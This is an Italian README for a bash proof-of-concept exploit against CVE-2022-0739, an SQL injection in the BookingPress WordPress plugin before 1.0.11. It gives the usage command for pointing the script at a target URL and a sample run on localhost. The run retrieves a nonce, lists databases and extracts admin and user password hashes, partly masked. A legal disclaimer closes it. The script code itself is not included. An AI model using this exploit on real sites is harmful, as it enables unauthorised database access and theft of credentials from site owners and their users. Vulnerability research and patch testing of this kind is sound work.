
Semplice script bash per automatizzare l'exploit di cve 2022 0739
Proof-of-Concept exploit (SQLI BookingPress prima della versione 1.0.11)
#Utilizzo Fornisci l'URL in cui il plugin Booking Press è in uso sull'applicazione.
bash exploit.sh ''
es. (Gli hash sono oscurati in questa demo)
┌──(user@user)-[~/]
└─$ bash sqli_exploit.sh 'http://localhost/calendar/'
____ __ _ ____
/ __ )____ ____ / /__(_)___ ____ _/ __ \________ __________
/ __ / __ \/ __ \/ //_/ / __ \/ __ `/ /_/ / ___/ _ \/ ___/ ___/
/ /_/ / /_/ / /_/ / ,< / / / / / /_/ / ____/ / / __(__ |__ )
/_____/\____/\____/_/|_/_/_/ /_/\__, /_/ /_/ \___/____/____/
/____/
_______ ________ ___ ____ ___ ___ ____ __________ ____
/ ____/ | / / ____/ |__ \ / __ \__ \|__ \ / __ \/__ /__ // __ \
/ / | | / / __/________/ // / / /_/ /__/ /_____/ / / / / / /_ </ /_/ /
/ /___ | |/ / /__/_____/ __// /_/ / __// __/_____/ /_/ / / /___/ /\__, /
\____/ |___/_____/ /____/\____/____/____/ \____/ /_//____//____/
[+] Exploiting http://localhost ...
[+] Vulnerable url at http://localhost/calendar/...
[+] Gettting nonce...
[+] Found nonce: 219087f4c2
[+] Extract database name...
information_schema
test_db
[+] Getting creds...
admin $P$BGrGrgXXXXXXXXXXXXXX
testUs3r $P$B4aNM28NXXXXXXXXXXX
DICHIARAZIONE DI NON RESPONSABILITÀ
L'uso di questo programma senza previo consenso reciproco può essere considerato un'attività illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per eventuali usi impropri o danni causati da questo programma.